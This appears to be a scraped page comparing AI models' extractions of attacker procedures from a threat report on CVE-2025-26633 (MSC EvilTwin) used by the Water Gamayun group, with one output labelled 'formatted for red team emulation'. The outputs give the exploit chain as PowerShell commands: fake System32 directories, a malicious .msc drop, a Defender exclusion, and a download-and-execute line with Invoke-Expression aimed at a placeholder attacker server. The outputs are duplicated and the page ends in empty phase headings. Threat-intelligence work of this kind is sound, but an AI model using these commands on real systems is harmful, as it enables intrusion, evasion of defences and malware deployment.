Figure 10. The EvilTwin technique to execute a PowerShell Water Gamayun not only uses these techniques in this loader, but also extensively applies them in other modules to download and execute next-stage payloads or plugins from the server. By leveraging these techniques, attackers can proxy the execution of malicious payload through legitimate Windows binaries by running non-malicious files. Conclusion Trend Research’s investigation into this campaign demonstrates Water Gamayun’s approach to exploiting vulnerabilities within the MMC framework. By abusing a vulnerability in the MMC framework, which we have designated as MSC EvilTwin (CVE-2025-26633), this threat actor has effectively devised a method to execute malicious code on infected machines. In this installment of our two-part series, we focused on the technical aspects of the MSC EvilTwin technique and the Trojan loader used to exploit this vulnerability. This attack employs multiple innovative techniques to maintain persistence and exfiltrate sensitive data, leveraging the manipulation of .msc files and Microsoft's MUIPath. Our findings revealed that this campaign is actively developing, utilizing various delivery methods and custom payloads, as detailed in the modules deployed by Water Gamayun, including EncryptHub stealer, DarkWisp backdoor, SilentPrism backdoor, and Rhadamanthys stealer. Through the collaboration between Microsoft and the Trend ZDI, this zero-day attack has been disclosed and a patch has quickly been issued to address it. Enterprises need comprehensive cybersecurity solutions to combat the evolving threats exemplified by campaigns such as those conducted by Water Gamayun. With techniques that exploit vulnerabilities like MSC EvilTwin, a layered approach and advanced cybersecurity solutions are vital for safeguarding digital assets in a landscape where threat actors are continuously refining their tactics. Proactive security with Trend Vision One™ Organizations can protect themselves from attacks such as those employed by Water Gamayun	Phase: Initial Access Technique: Exploit Vulnerability (CVE-2025-26633) Procedure: Abuse vulnerability in the MMC framework using MSC EvilTwin to execute code. Phase: Execution Technique: PowerShell Execution via Proxy (EvilTwin) Procedure: Use legitimate Windows binaries to proxy the execution of malicious PowerShell payloads through manipulation of .msc files and MUIPath. Phase: Persistence Technique: Trojans and Custom Payload Deployment Procedure: Utilize custom payloads such as EncryptHub stealer, DarkWisp backdoor, SilentPrism backdoor, and Rhadamanthys stealer to maintain access. Phase: Data Exfiltration Technique: Data Stealing Procedure: Use custom payloads to exfiltrate sensitive data, adapting methods based on modules like EncryptHub and Rhadamanthys. The threat actor utilizes a layered approach, leveraging the manipulation of legitimate tools and framework vulnerabilities to execute and maintain control over infected systems.

Gemini 2.0

Gemini 2.0
Model: gemini-2.0-flash Phase: Initial Access Technique: Exploiting MSC EvilTwin via Malicious Document Procedure: A digitally-signed MSI file masquerading as a popular Chinese software (e.g., DingTalk or QQTalk) is used to fetch and execute the MSC EvilTwin loader. Phase: Execution Technique: MSC EvilTwin Technique - File Manipulation Procedure: Creation of mock directories resembling standard system paths (e.g., "C:\Windows \System32"). Technique: MSC EvilTwin Technique - Writing malicious files to disk Command: `powershell New-Item "\\?\C:\Windows \System32\" -ItemType Directory New-Item "\\?\C:\Windows \System32\en-US" -ItemType Directory [System.IO.File]::WriteAllBytes("C:\Windows \System32\WmiMgmt.msc", $decodedBytesOriginal) [System.IO.File]::WriteAllBytes("C:\Windows \System32\en-US\WmiMgmt.msc", $decodedBytesFakes)` Technique: MSC EvilTwin Technique - Modifying the contents of malicious file in en-US directory Command: `powershell (Get-Content -Path '\\?\C:\Windows \System32\en-US\WmiMgmt.msc' -Raw) -replace '{htmlLoaderUrl}', $htmlLoaderUrl \| Set-Content -Path '\\?\C:\Windows \System32\en-US\WmiMgmt.msc'` Technique: MSC EvilTwin Technique - Execution of malicious MSC file Command: `powershell Start-Process - FilePath 'C:\Windows \System32\WmiMgmt.msc'` Technique: MSC EvilTwin Technique - Cleanup Command: `powershell Remove-Item -Path "\\?\C:\Windows \System32" -Recurse -Force Remove-Item -Path "\\?\C:\Windows \System32\en-US" -Recurse -Force Remove-Item -Path "\\?\C:\Windows \" -Recurse -Force` Technique: PowerShell Command Execution via .msc File Web Rendering Procedure: Embedding `external.ExecuteShellCommand` within a script tag in the malicious HTML page loaded by the .msc file to execute PowerShell commands. Command Example: ```html ``` Phase: Further Payload Delivery (Example) Technique: Payload download and execution using PowerShell Command (Example): `powershell Invoke-WebRequest -Uri "[C&C Server]" -OutFile "$env:TEMP\transport.exe" Start-Process "$env:TEMP\transport.exe" -Wait`

Model: gemini-2.0-flash

Phase: Initial Access

Technique: Exploiting MSC EvilTwin via Malicious Document
Procedure: A digitally-signed MSI file masquerading as a popular Chinese software (e.g., DingTalk or QQTalk) is used to fetch and execute the MSC EvilTwin loader.

Phase: Execution

Technique: MSC EvilTwin Technique - File Manipulation
Procedure: Creation of mock directories resembling standard system paths (e.g., "C:\Windows \System32").
Technique: MSC EvilTwin Technique - Writing malicious files to disk
Command: powershell New-Item "\\?\C:\Windows \System32\" -ItemType Directory New-Item "\\?\C:\Windows \System32\en-US" -ItemType Directory [System.IO.File]::WriteAllBytes("C:\Windows \System32\WmiMgmt.msc", $decodedBytesOriginal) [System.IO.File]::WriteAllBytes("C:\Windows \System32\en-US\WmiMgmt.msc", $decodedBytesFakes)
Technique: MSC EvilTwin Technique - Modifying the contents of malicious file in en-US directory
Command: powershell (Get-Content -Path '\\?\C:\Windows \System32\en-US\WmiMgmt.msc' -Raw) -replace '{htmlLoaderUrl}', $htmlLoaderUrl | Set-Content -Path '\\?\C:\Windows \System32\en-US\WmiMgmt.msc'
Technique: MSC EvilTwin Technique - Execution of malicious MSC file
Command: powershell Start-Process - FilePath 'C:\Windows \System32\WmiMgmt.msc'
Technique: MSC EvilTwin Technique - Cleanup
Command: powershell Remove-Item -Path "\\?\C:\Windows \System32" -Recurse -Force Remove-Item -Path "\\?\C:\Windows \System32\en-US" -Recurse -Force Remove-Item -Path "\\?\C:\Windows \" -Recurse -Force
Technique: PowerShell Command Execution via .msc File Web Rendering
Procedure: Embedding external.ExecuteShellCommand within a script tag in the malicious HTML page loaded by the .msc file to execute PowerShell commands.
Command Example: ```html

```

Phase: Further Payload Delivery (Example)

Technique: Payload download and execution using PowerShell
Command (Example): powershell Invoke-WebRequest -Uri "[C&C Server]" -OutFile "$env:TEMP\transport.exe" Start-Process "$env:TEMP\transport.exe" -Wait

Gemini 2.5

Gemini 2.5
Model: gemini-2.5-flash-preview-05-20 Here are the extracted and structured procedures used by the threat actor, focusing on command lines, executed programs, tools, and attack techniques, formatted for red team emulation: Phase: Initial Access Technique: Malicious MSI File Delivery Procedure: The attack initiates with a digitally-signed MSI file, disguised as legitimate popular software, which is designed to download and execute the next-stage loader. Phase: Execution & Defense Evasion Technique: PowerShell Trojan Loader Deployment Procedure: The initial MSI file fetches and executes a PowerShell-based Trojan loader. Technique: Mock Trusted Directory Creation Procedure: The loader creates directories that mimic standard system paths by adding trailing spaces, leveraging the `\\?\` prefix for extended path support. Command: `New-Item "\\?\C:\Windows \System32\" -ItemType Directory` Command: `New-Item "\\?\C:\Windows \System32\en-US" -ItemType Directory` Technique: File Content Dropping & Manipulation Procedure: The loader decodes Base64-encoded contents of a legitimate `.msc` file and a malicious `.msc` file, writing them to the mock directories. Procedure: Write original `.msc` content: `[System.IO.File]::WriteAllBytes("C:\Windows \System32\WmiMgmt.msc", <decoded_original_bytes>)` Procedure: Write malicious `.msc` content: `[System.IO.File]::WriteAllBytes("C:\Windows \System32\en-US\WmiMgmt.msc", <decoded_hacked_bytes>)` Procedure: Modify the malicious `.msc` file located in the `en-US` directory to embed a C2 URL placeholder. Command: `(Get-Content -Path '\\?\C:\Windows \System32\en-US\WmiMgmt.msc' -Raw) -replace '{htmlLoaderUrl}', 'http://<ATTACKER_SERVER_URL>/' \| Set-Content -Path '\\?\C:\Windows \System32\en-US\WmiMgmt.msc'` Technique: MMC EvilTwin Exploitation (CVE-2025-26633) Procedure: The loader executes the seemingly legitimate `.msc` file from the mock `System32` directory. Due to MUIPath abuse, `mmc.exe` loads and executes the malicious version from the `en-US` subdirectory instead. Command: `Start-Process -FilePath 'C:\Windows \System32\WmiMgmt.msc'` Phase: Command and Control & Payload Execution Technique: Command Execution via MMC's `ExecuteShellCommand` Procedure: The malicious `.msc` file, loaded by `mmc.exe`, contains an ActiveX control that hosts Internet Explorer browser components. It renders an HTML page from the attacker's C2 server. Procedure: The rendered HTML page contains JavaScript that calls `external.ExecuteShellCommand` to execute PowerShell commands on the victim's machine. Command (within rendered HTML's script tag): `external.ExecuteShellCommand("powershell.exe", "", "-ExecutionPolicy Bypass -WindowStyle Hidden -Command & Add-MpPreference -ExclusionPath $env:TEMP}", "Minimized")` Command (within rendered HTML's script tag): `external.ExecuteShellCommand("powershell.exe", "", "-ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Invoke-RestMethod -Uri 'http://<ATTACKER_SERVER_URL>/<PAYLOAD_NAME>.ps1' \| Invoke-Expression\"", "Minimized")` Command (within rendered HTML's script tag, for cleanup): `external.ExecuteShellCommand("powershell.exe", "", "-ExecutionPolicy Bypass -WindowStyle Hidden -Command & taskkill /f /im mmc.exe}", "Minimized")` Technique: PowerShell Payload Download and Execution Procedure: A PowerShell command, likely invoked by `ExecuteShellCommand`, downloads and executes the next-stage payload (e.g., a stealer or backdoor). Command (example, implied execution): `Invoke-WebRequest -Uri "http://<ATTACKER_SERVER_URL>/<PAYLOAD_NAME>.exe" -OutFile "$env:TEMP\transport.exe"; Start-Process "$env:TEMP\transport.exe" -Wait` Phase: Cleanup Technique: Deleting Created Files and Directories Procedure: The loader attempts to remove the mock directories and files it created. Command: `Remove-Item -Path "\\?\C:\Windows \System32" -Recurse -Force` Command: `Remove-Item -Path "\\?\C:\Windows \System32\en-US" -Recurse -Force` Command: `Remove-Item -Path "\\?\C:\Windows \" -Recurse -Force` (Note: The trailing space in the path `\\?\C:\Windows \` is as per the source text.)

Model: gemini-2.5-flash-preview-05-20

Here are the extracted and structured procedures used by the threat actor, focusing on command lines, executed programs, tools, and attack techniques, formatted for red team emulation:

Phase: Initial Access

Technique: Malicious MSI File Delivery
Procedure: The attack initiates with a digitally-signed MSI file, disguised as legitimate popular software, which is designed to download and execute the next-stage loader.

Phase: Execution & Defense Evasion

Technique: PowerShell Trojan Loader Deployment
Procedure: The initial MSI file fetches and executes a PowerShell-based Trojan loader.
Technique: Mock Trusted Directory Creation
Procedure: The loader creates directories that mimic standard system paths by adding trailing spaces, leveraging the \\?\ prefix for extended path support.
- Command: New-Item "\\?\C:\Windows \System32\" -ItemType Directory
- Command: New-Item "\\?\C:\Windows \System32\en-US" -ItemType Directory
Technique: File Content Dropping & Manipulation
Procedure: The loader decodes Base64-encoded contents of a legitimate .msc file and a malicious .msc file, writing them to the mock directories.
- Procedure: Write original .msc content: [System.IO.File]::WriteAllBytes("C:\Windows \System32\WmiMgmt.msc", <decoded_original_bytes>)
- Procedure: Write malicious .msc content: [System.IO.File]::WriteAllBytes("C:\Windows \System32\en-US\WmiMgmt.msc", <decoded_hacked_bytes>)
- Procedure: Modify the malicious .msc file located in the en-US directory to embed a C2 URL placeholder.
  - Command: (Get-Content -Path '\\?\C:\Windows \System32\en-US\WmiMgmt.msc' -Raw) -replace '{htmlLoaderUrl}', 'http://<ATTACKER_SERVER_URL>/' | Set-Content -Path '\\?\C:\Windows \System32\en-US\WmiMgmt.msc'
Technique: MMC EvilTwin Exploitation (CVE-2025-26633)
Procedure: The loader executes the seemingly legitimate .msc file from the mock System32 directory. Due to MUIPath abuse, mmc.exe loads and executes the malicious version from the en-US subdirectory instead.
- Command: Start-Process -FilePath 'C:\Windows \System32\WmiMgmt.msc'

Phase: Command and Control & Payload Execution

Technique: Command Execution via MMC's ExecuteShellCommand
Procedure: The malicious .msc file, loaded by mmc.exe, contains an ActiveX control that hosts Internet Explorer browser components. It renders an HTML page from the attacker's C2 server.
Procedure: The rendered HTML page contains JavaScript that calls external.ExecuteShellCommand to execute PowerShell commands on the victim's machine.
- Command (within rendered HTML's script tag): external.ExecuteShellCommand("powershell.exe", "", "-ExecutionPolicy Bypass -WindowStyle Hidden -Command & Add-MpPreference -ExclusionPath $env:TEMP}", "Minimized")
- Command (within rendered HTML's script tag): external.ExecuteShellCommand("powershell.exe", "", "-ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Invoke-RestMethod -Uri 'http://<ATTACKER_SERVER_URL>/<PAYLOAD_NAME>.ps1' | Invoke-Expression\"", "Minimized")
- Command (within rendered HTML's script tag, for cleanup): external.ExecuteShellCommand("powershell.exe", "", "-ExecutionPolicy Bypass -WindowStyle Hidden -Command & taskkill /f /im mmc.exe}", "Minimized")
Technique: PowerShell Payload Download and Execution
Procedure: A PowerShell command, likely invoked by ExecuteShellCommand, downloads and executes the next-stage payload (e.g., a stealer or backdoor).
- Command (example, implied execution): Invoke-WebRequest -Uri "http://<ATTACKER_SERVER_URL>/<PAYLOAD_NAME>.exe" -OutFile "$env:TEMP\transport.exe"; Start-Process "$env:TEMP\transport.exe" -Wait

Phase: Cleanup

Technique: Deleting Created Files and Directories
Procedure: The loader attempts to remove the mock directories and files it created.
- Command: Remove-Item -Path "\\?\C:\Windows \System32" -Recurse -Force
- Command: Remove-Item -Path "\\?\C:\Windows \System32\en-US" -Recurse -Force
- Command: Remove-Item -Path "\\?\C:\Windows \" -Recurse -Force (Note: The trailing space in the path \\?\C:\Windows \ is as per the source text.)

CVE-2025-26633: How Water Gamayun Weaponizes MUIPath using MSC EvilTwin

Phase: Initial Access

Phase: Execution

Phase: Persistence

Phase: Data Collection

Phase: Exfiltration

Phase: Initial Access

Phase: Execution

Phase: Payload Deployment

Phase: Credential Access

Phase: Persistence

Phase: Impact

Phase: Execution

Phase: Execution

Phase: Execution

Phase: Execution

Phase: Initial Access

Phase: Execution

Phase: Defense Evasion

Phase: Payload Delivery

Phase: Execution

Phase: Initial Access

Phase: Execution

Phase: Persistence

Phase: Execution via Browser Control

Phase: Impact

Phase: Initial Access

Phase: Execution

Phase: Persistence

Phase: Data Exfiltration

Model: gemini-2.0-flash

Phase: Initial Access

Phase: Execution

Phase: Further Payload Delivery (Example)

Model: gemini-2.5-flash-preview-05-20

Phase: Initial Access

Phase: Execution & Defense Evasion

Phase: Command and Control & Payload Execution

Phase: Cleanup